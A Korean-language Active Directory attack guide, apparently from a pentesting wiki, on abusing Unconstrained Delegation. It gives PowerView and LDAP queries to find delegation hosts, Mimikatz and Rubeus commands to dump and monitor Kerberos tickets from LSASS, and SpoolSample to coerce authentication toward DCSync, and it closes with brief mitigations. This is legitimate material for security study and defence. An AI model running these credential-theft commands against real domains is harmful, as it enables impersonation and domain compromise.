Unconstrained Delegation

도메인 관리자는 도메인 내의 컴퓨터에 대해이 기능을 설정할 수 있습니다. 그런 다음 사용자가 컴퓨터에 로그인 할 때마다 해당 사용자의 TGT의 사본이 TGS에 의해 전송되고 LSASS의 메모리에 저장됩니다. 따라서 해당 컴퓨터에서 관리자 권한을 가지고 있다면 티켓을 덤프하고 어떤 컴퓨터에서든 사용자를 위장할 수 있습니다.

따라서 도메인 관리자가 "Unconstrained Delegation" 기능이 활성화 된 컴퓨터에 로그인하고 해당 컴퓨터에서 로컬 관리자 권한을 가지고 있다면 티켓을 덤프하고 도메인 관리자를 어디에서든 위장할 수 있습니다 (도메인 권한 상승).

이 속성을 가진 컴퓨터 개체를 찾으려면 userAccountControl 속성이 ADS_UF_TRUSTED_FOR_DELEGATION을 포함하는지 확인하면 됩니다. Powerview가 수행하는 것과 동일한 작업을 LDAP 필터 '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))'로 수행할 수 있습니다.

# Unconstrained 컴퓨터 목록
## Powerview
Get-NetComputer -Unconstrained #DCs는 항상 표시되지만 권한 상승에는 유용하지 않습니다.
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Mimikatz를 사용하여 티켓 내보내기
privilege::debug
sekurlsa::tickets /export #권장하는 방법
kerberos::list /export #다른 방법

# 로그인 모니터링 및 새로운 티켓 내보내기
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #10초마다 새로운 TGT 확인

Mimikatz 또는 Rubeus를 사용하여 관리자 (또는 피해자 사용자)의 티켓을 메모리에 로드하고 티켓 전달에 대한 자세한 정보는 여기에서 확인하세요. 자세한 정보: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ ired.team에서 Unconstrained Delegation에 대한 자세한 정보

강제 인증

공격자가 "Unconstrained Delegation"에 허용된 컴퓨터를 침투할 수 있다면 프린트 서버를 속일 수 있습니다. 이렇게 하면 서버의 메모리에 TGT가 저장되어 자동으로 로그인합니다. 그런 다음 공격자는 사용자 프린트 서버 컴퓨터 계정을 위장하기 위해 Pass the Ticket 공격을 수행할 수 있습니다.

프린트 서버가 어떤 컴퓨터에 대해 로그인하도록하려면 SpoolSample을 사용할 수 있습니다.

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

만약 TGT가 도메인 컨트롤러에서 온 것이라면, DCSync 공격을 수행하여 DC에서 모든 해시를 얻을 수 있습니다. 이 공격에 대한 자세한 정보는 ired.team에서 확인하세요.

다음은 인증을 강제로 시도하는 다른 방법입니다:

완화 방법

• DA/Admin 로그인을 특정 서비스로 제한합니다.

• 특권 계정에 대해 "계정이 민감하며 위임할 수 없음"을 설정합니다.